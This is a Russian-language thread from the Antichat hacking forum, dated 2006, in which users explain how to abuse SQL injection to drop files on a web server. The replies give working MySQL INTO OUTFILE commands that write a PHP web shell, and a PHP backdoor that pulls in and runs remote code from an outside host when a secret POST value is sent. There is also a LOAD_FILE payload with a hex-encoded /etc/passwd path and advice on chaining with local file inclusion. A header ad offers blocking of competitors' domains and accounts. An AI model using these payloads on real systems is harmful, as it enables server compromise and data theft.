Помогите с Sql

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Помогите с Sql

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Помогите с Sql

17.12.2006, 18:20

TAZMAD

Новичок

Регистрация: 19.11.2004

Сообщений: 6

С нами: 11300996

Репутация: 0

Помогите с Sql

Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql.

Зарание благодарен....

𝕏 Twitter Reddit Telegram Копировать ссылку

17.12.2006, 18:28

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

select 'file_content' INTO OUTFILE '/путь'

17.12.2006, 18:29

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

С нами: 11058146

Репутация: 4536

outfile

Код:

SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';

__________________
Фреймворк для спамера :(
Услуги программирования

17.12.2006, 18:58

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде

PHP код:


		
			
<? 

if ($_POST ['someshit'] == "killme")

{

include ("http://someshit.nm.ru/br/s.php");

} 

else 

{

die;

}

?>

а уже после делать то что написал Green_Bear =)

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

18.12.2006, 01:47

nc.STRIEM

Members of Antichat - Level 5

Регистрация: 05.04.2006

Сообщений: 1,066

С нами: 10578566

Репутация: 1228

а не проще ли сделать

Код:

SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

18.12.2006, 04:05

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

а если путь не известен?

18.12.2006, 07:09

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Цитата:

а если путь не известен?

То узнай его...

18.12.2006, 22:18

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

Цитата:

Сообщение от [ cash ]

То узнай его...

Как если ошибка не выводится?

18.12.2006, 22:40

SQLHACK

Голос разума

Регистрация: 27.09.2006

Сообщений: 529

С нами: 10326626

Репутация: 1617

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &

#10

19.12.2006, 15:18

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

Цитата:

Сообщение от SQLHACK

mysql 4.0.21 прав мало походу не могу прочесть passwd, локального инклуда нету.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ПомогитЕ !!! подалуста найти кряк	гейлордфакерЪ	Болталка	2	30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!!	farik.aka	Уязвимости Mail-сервис	1	17.09.2006 13:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules